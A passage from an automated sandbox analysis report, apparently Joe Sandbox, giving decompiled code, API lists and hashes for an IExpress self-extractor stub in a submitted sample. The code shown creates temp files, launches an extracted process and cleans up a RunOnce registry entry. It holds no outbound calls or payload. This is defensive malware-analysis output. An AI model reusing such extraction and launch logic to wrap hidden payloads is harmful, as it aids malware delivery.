                                                                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                                                                              				void* _t23;
                                                                                                                                                                                                                                              				intOrPtr* _t27;
                                                                                                                                                                                                                                              				CHAR* _t33;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                              				_t33 = __ecx;
                                                                                                                                                                                                                                              				_t27 = __ecx;
                                                                                                                                                                                                                                              				_t23 = __ecx + 1;
                                                                                                                                                                                                                                              				do {
                                                                                                                                                                                                                                              					_t6 =  *_t27;
                                                                                                                                                                                                                                              					_t27 = _t27 + 1;
                                                                                                                                                                                                                                              				} while (_t6 != 0);
                                                                                                                                                                                                                                              				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                                                              				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                                                              				if(_t20 != 0) {
                                                                                                                                                                                                                                              					E001A1680(_t20, _t36, _t33);
                                                                                                                                                                                                                                              					E001A658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                                                              					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                                                              					_v8 = _t10;
                                                                                                                                                                                                                                              					LocalFree(_t20);
                                                                                                                                                                                                                                              					_t12 = _v8;
                                                                                                                                                                                                                                              					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                                                              						goto L4;
                                                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                                                              						CloseHandle(_t12);
                                                                                                                                                                                                                                              						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                                                              						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                                                              							goto L4;
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							 *0x1a9124 = 0;
                                                                                                                                                                                                                                              							_t14 = 1;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					E001A44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					L4:
                                                                                                                                                                                                                                              					 *0x1a9124 = E001A6285();
                                                                                                                                                                                                                                              					_t14 = 0;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t14;
                                                                                                                                                                                                                                              			}














                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,001A5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 001A58E7
                                                                                                                                                                                                                                              • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,001A5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 001A5943
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,001A5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 001A594D
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,001A5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 001A595C
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,001A5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 001A5963
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$TMP4351$.TMP
                                                                                                                                                                                                                                              • API String ID: 747627703-3033780695
                                                                                                                                                                                                                                              • Opcode ID: 9ca721b982ce9abdf15ead47b69ec73590e47daebeb3b3e0522dcc14d935941f
                                                                                                                                                                                                                                              • Instruction ID: 3145e2f777e23e82b6665e72518a9de9f4a5dd3fb62495991c4d766a32449ec6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ca721b982ce9abdf15ead47b69ec73590e47daebeb3b3e0522dcc14d935941f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C811E2757042207BC7245F7AAC4DBAB7E9AEF8B374F100629F50AD7591CB709846C6A0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 675 1a3fef-1a4010 676 1a410a-1a411a call 1a6ce0 675->676 677 1a4016-1a403b CreateProcessA 675->677 678 1a4041-1a406e WaitForSingleObject GetExitCodeProcess 677->678 679 1a40c4-1a4101 call 1a6285 GetLastError FormatMessageA call 1a44b9 677->679 681 1a4070-1a4077 678->681 682 1a4091 call 1a411b 678->682 691 1a4106 679->691 681->682 686 1a4079-1a407b 681->686 690 1a4096-1a40b8 CloseHandle * 2 682->690 686->682 689 1a407d-1a4089 686->689 689->682 692 1a408b 689->692 693 1a40ba-1a40c0 690->693 694 1a4108 690->694 691->694 692->682 693->694 695 1a40c2 693->695 694->676 695->691
                                                                                                                                                                                                                                              C-Code - Quality: 84%
                                                                                                                                                                                                                                              			E001A3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v524;
                                                                                                                                                                                                                                              				long _v528;
                                                                                                                                                                                                                                              				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t20;
                                                                                                                                                                                                                                              				void* _t22;
                                                                                                                                                                                                                                              				int _t25;
                                                                                                                                                                                                                                              				intOrPtr* _t39;
                                                                                                                                                                                                                                              				signed int _t44;
                                                                                                                                                                                                                                              				void* _t49;
                                                                                                                                                                                                                                              				signed int _t50;
                                                                                                                                                                                                                                              				intOrPtr _t53;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t45 = __edx;
                                                                                                                                                                                                                                              				_t20 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                                                              				_t39 = __ecx;
                                                                                                                                                                                                                                              				_t49 = 1;
                                                                                                                                                                                                                                              				_t22 = 0;
                                                                                                                                                                                                                                              				if(__ecx == 0) {
                                                                                                                                                                                                                                              					L13:
                                                                                                                                                                                                                                              					return E001A6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                                                                              				asm("stosd");
                                                                                                                                                                                                                                              				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                                                              				if(_t25 == 0) {
                                                                                                                                                                                                                                              					 *0x1a9124 = E001A6285();
                                                                                                                                                                                                                                              					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
                                                                                                                                                                                                                                              					_t45 = 0x4c4;
                                                                                                                                                                                                                                              					E001A44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
                                                                                                                                                                                                                                              					L11:
                                                                                                                                                                                                                                              					_t49 = 0;
                                                                                                                                                                                                                                              					L12:
                                                                                                                                                                                                                                              					_t22 = _t49;
                                                                                                                                                                                                                                              					goto L13;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                                                              				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                                                              				_t44 = _v528;
                                                                                                                                                                                                                                              				_t53 =  *0x1a8a28; // 0x0
                                                                                                                                                                                                                                              				if(_t53 == 0) {
                                                                                                                                                                                                                                              					_t34 =  *0x1a9a2c; // 0x0
                                                                                                                                                                                                                                              					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                                                              						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                                                              						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                                                              							 *0x1a9a2c = _t44;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				E001A411B(_t34, _t44);
                                                                                                                                                                                                                                              				CloseHandle(_v544.hThread);
                                                                                                                                                                                                                                              				CloseHandle(_v544);
                                                                                                                                                                                                                                              				if(( *0x1a9a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                                                              					goto L12;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					goto L11;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}



















                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CreateProcessA.KERNELBASE ref: 001A4033
                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001A4049
                                                                                                                                                                                                                                              • GetExitCodeProcess.KERNELBASE ref: 001A405C
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 001A409C
                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 001A40A8
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 001A40DC
                                                                                                                                                                                                                                              • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 001A40E9
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3183975587-0
                                                                                                                                                                                                                                              • Opcode ID: e7ab30b03d7d87ffa4874d779370c5a8c6c31faa290acbadc6e045f89c8e5e95
                                                                                                                                                                                                                                              • Instruction ID: 22382e3cd73407e8a7329529df3ac5e0829ef24edd0a75cac8000bfa0fadd5ca
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e7ab30b03d7d87ffa4874d779370c5a8c6c31faa290acbadc6e045f89c8e5e95
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF319C79640218BBEB209B65DC49FBB7778EBE6710F2001AAF605D25A1CBB05DC5CB21
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E001A51E5(void* __eflags) {
                                                                                                                                                                                                                                              				int _t5;
                                                                                                                                                                                                                                              				void* _t6;
                                                                                                                                                                                                                                              				void* _t28;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t1 = E001A468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                              				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                              				if(_t28 != 0) {
                                                                                                                                                                                                                                              					if(E001A468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                                                              						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                                                              						if(_t5 != 0) {
                                                                                                                                                                                                                                              							_t6 = E001A44B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                                                              							LocalFree(_t28);
                                                                                                                                                                                                                                              							if(_t6 != 6) {
                                                                                                                                                                                                                                              								 *0x1a9124 = 0x800704c7;
                                                                                                                                                                                                                                              								L10:
                                                                                                                                                                                                                                              								return 0;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							 *0x1a9124 = 0;
                                                                                                                                                                                                                                              							L6:
                                                                                                                                                                                                                                              							return 1;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						LocalFree(_t28);
                                                                                                                                                                                                                                              						goto L6;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					E001A44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              					LocalFree(_t28);
                                                                                                                                                                                                                                              					 *0x1a9124 = 0x80070714;
                                                                                                                                                                                                                                              					goto L10;
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				E001A44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                              				 *0x1a9124 = E001A6285();
                                                                                                                                                                                                                                              				goto L10;
                                                                                                                                                                                                                                              			}







                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001A46A0
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: SizeofResource.KERNEL32(00000000,00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46A9
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001A46C3
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: LoadResource.KERNEL32(00000000,00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46CC
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: LockResource.KERNEL32(00000000,?,001A2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46D3
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: memcpy_s.MSVCRT ref: 001A46E5
                                                                                                                                                                                                                                                • Part of subcall function 001A468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001A46EF
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,001A2F4D,?,00000002,00000000), ref: 001A5201
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 001A5250
                                                                                                                                                                                                                                                • Part of subcall function 001A44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 001A4518
                                                                                                                                                                                                                                                • Part of subcall function 001A44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 001A4554
                                                                                                                                                                                                                                                • Part of subcall function 001A6285: GetLastError.KERNEL32(001A5BBC), ref: 001A6285
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
• Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                              • String ID: <None>$UPROMPT
                                                                                                                                                                                                                                              • API String ID: 957408736-2980973527
                                                                                                                                                                                                                                              • Opcode ID: 3e44bfc92b6d31ad8a76951bc86c68a8f3312fcbd3fbb790ad87b12502c65c58
                                                                                                                                                                                                                                              • Instruction ID: 489b70f33311d7de34fde18dd253f97f16957f6ea386dd74d12f7ebcad67d6dc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e44bfc92b6d31ad8a76951bc86c68a8f3312fcbd3fbb790ad87b12502c65c58
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F611EFBD304201BBE3256BB59D49B3B619EEFDB390F51402AF642E6590DBB88C418224
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 74%
                                                                                                                                                                                                                                              			E001A52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				signed int _t9;
                                                                                                                                                                                                                                              				signed int _t11;
                                                                                                                                                                                                                                              				void* _t21;
                                                                                                                                                                                                                                              				void* _t29;
                                                                                                                                                                                                                                              				CHAR** _t31;
                                                                                                                                                                                                                                              				void* _t32;
                                                                                                                                                                                                                                              				signed int _t33;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t28 = __edi;
                                                                                                                                                                                                                                              				_t22 = __ecx;
                                                                                                                                                                                                                                              				_t21 = __ebx;
                                                                                                                                                                                                                                              				_t9 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t9 ^ _t33;
                                                                                                                                                                                                                                              				_push(__esi);
                                                                                                                                                                                                                                              				_t31 =  *0x1a91e0; // 0x2988e30
                                                                                                                                                                                                                                              				if(_t31 != 0) {
                                                                                                                                                                                                                                              					_push(__edi);
                                                                                                                                                                                                                                              					do {
                                                                                                                                                                                                                                              						_t29 = _t31;
                                                                                                                                                                                                                                              						if( *0x1a8a24 == 0 &&  *0x1a9a30 == 0) {
                                                                                                                                                                                                                                              							SetFileAttributesA( *_t31, 0x80); // executed
                                                                                                                                                                                                                                              							DeleteFileA( *_t31); // executed
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t31 = _t31[1];
                                                                                                                                                                                                                                              						LocalFree( *_t29);
                                                                                                                                                                                                                                              						LocalFree(_t29);
                                                                                                                                                                                                                                              					} while (_t31 != 0);
                                                                                                                                                                                                                                              					_pop(_t28);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				_t11 =  *0x1a8a20; // 0x0
                                                                                                                                                                                                                                              				_pop(_t32);
                                                                                                                                                                                                                                              				if(_t11 != 0 &&  *0x1a8a24 == 0 &&  *0x1a9a30 == 0) {
                                                                                                                                                                                                                                              					_push(_t22);
                                                                                                                                                                                                                                              					E001A1781( &_v268, 0x104, _t22, "C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                                                              					if(( *0x1a9a34 & 0x00000020) != 0) {
                                                                                                                                                                                                                                              						E001A65E8( &_v268);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					SetCurrentDirectoryA(".."); // executed
                                                                                                                                                                                                                                              					_t22 =  &_v268;
                                                                                                                                                                                                                                              					E001A2390( &_v268);
                                                                                                                                                                                                                                              					_t11 =  *0x1a8a20; // 0x0
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				if( *0x1a9a40 != 1 && _t11 != 0) {
                                                                                                                                                                                                                                              					_t11 = E001A1FE1(_t22); // executed
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				 *0x1a8a20 =  *0x1a8a20 & 0x00000000;
                                                                                                                                                                                                                                              				return E001A6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                                                                                                                                                                                              			}













                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SetFileAttributesA.KERNELBASE(02988E30,00000080,?,00000000), ref: 001A52F2
                                                                                                                                                                                                                                              • DeleteFileA.KERNELBASE(02988E30), ref: 001A52FA
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(02988E30,?,00000000), ref: 001A5305
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(02988E30), ref: 001A530C
                                                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNELBASE(001A11FC,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 001A5363
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 001A5334
Memory Dump Source
• Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
• Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                              • API String ID: 2833751637-3647970563
                                                                                                                                                                                                                                              • Opcode ID: ff4a400de9e812c87840fb145becf072ee85ba89480a102cd2b4271a84acc1da
                                                                                                                                                                                                                                              • Instruction ID: f150ffa3d902a703824624dd64fad666e77f7948aad407c7b951167da5b8e2ef
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff4a400de9e812c87840fb145becf072ee85ba89480a102cd2b4271a84acc1da
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3F21AE39A04614DFDF219B24ED09B6977B5BF57790F44015AF842939A0DFB45CC4CB80
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E001A1FE1(void* __ecx) {
                                                                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                                                                              				long _t4;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				if( *0x1a8530 != 0) {
                                                                                                                                                                                                                                              					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                                                              					if(_t4 == 0) {
                                                                                                                                                                                                                                              						RegDeleteValueA(_v8, "wextract_cleanup1"); // executed
                                                                                                                                                                                                                                              						return RegCloseKey(_v8);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t4;
                                                                                                                                                                                                                                              			}






                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,001A538C,?,?,001A538C), ref: 001A2005
                                                                                                                                                                                                                                              • RegDeleteValueA.KERNELBASE(001A538C,wextract_cleanup1,?,?,001A538C), ref: 001A2017
                                                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(001A538C,?,?,001A538C), ref: 001A2020
                                                                                                                                                                                                                                              Strings
Memory Dump Source
• Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
• Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup1
                                                                                                                                                                                                                                              • API String ID: 849931509-1592051331
                                                                                                                                                                                                                                              • Opcode ID: c33db19dfdc34334716127bbf3e5d9ca0f1dc251837fdac16752a407defd9a87
                                                                                                                                                                                                                                              • Instruction ID: b6b22393c5b413bf38390cedc52f4cf38dcad578ad949ee839d60aaa22f5774c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c33db19dfdc34334716127bbf3e5d9ca0f1dc251837fdac16752a407defd9a87
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6AE08634D50318BBD7219F90EE0AF6A7B69FB03750F500194FE04A0460EB715E94D715
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                                                                                                              			E001A4CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                                                              				signed int _t29;
                                                                                                                                                                                                                                              				int _t30;
                                                                                                                                                                                                                                              				long _t32;
                                                                                                                                                                                                                                              				signed int _t33;
                                                                                                                                                                                                                                              				long _t35;
                                                                                                                                                                                                                                              				long _t36;
                                                                                                                                                                                                                                              				struct HWND__* _t37;
                                                                                                                                                                                                                                              				long _t38;
                                                                                                                                                                                                                                              				long _t39;
                                                                                                                                                                                                                                              				long _t41;
                                                                                                                                                                                                                                              				long _t44;
                                                                                                                                                                                                                                              				long _t45;
                                                                                                                                                                                                                                              				long _t46;
                                                                                                                                                                                                                                              				signed int _t50;
                                                                                                                                                                                                                                              				long _t51;
                                                                                                                                                                                                                                              				char* _t58;
                                                                                                                                                                                                                                              				long _t59;
                                                                                                                                                                                                                                              				char* _t63;
                                                                                                                                                                                                                                              				long _t64;
                                                                                                                                                                                                                                              				CHAR* _t71;
                                                                                                                                                                                                                                              				CHAR* _t74;
                                                                                                                                                                                                                                              				int _t75;
                                                                                                                                                                                                                                              				signed int _t76;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t69 = __edx;
                                                                                                                                                                                                                                              				_t29 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_t30 = _t29 ^ _t76;
                                                                                                                                                                                                                                              				_v8 = _t30;
                                                                                                                                                                                                                                              				_t75 = _a8;
                                                                                                                                                                                                                                              				if( *0x1a91d8 == 0) {
                                                                                                                                                                                                                                              					_t32 = _a4;
                                                                                                                                                                                                                                              					__eflags = _t32;
                                                                                                                                                                                                                                              					if(_t32 == 0) {
                                                                                                                                                                                                                                              						_t33 = E001A4E99(_t75);
                                                                                                                                                                                                                                              						L35:
                                                                                                                                                                                                                                              						return E001A6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t35 = _t32 - 1;
                                                                                                                                                                                                                                              					__eflags = _t35;
                                                                                                                                                                                                                                              					if(_t35 == 0) {
                                                                                                                                                                                                                                              						L9:
                                                                                                                                                                                                                                              						_t33 = 0;
                                                                                                                                                                                                                                              						goto L35;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t36 = _t35 - 1;
                                                                                                                                                                                                                                              					__eflags = _t36;
                                                                                                                                                                                                                                              					if(_t36 == 0) {
                                                                                                                                                                                                                                              						_t37 =  *0x1a8584; // 0x0
                                                                                                                                                                                                                                              						__eflags = _t37;
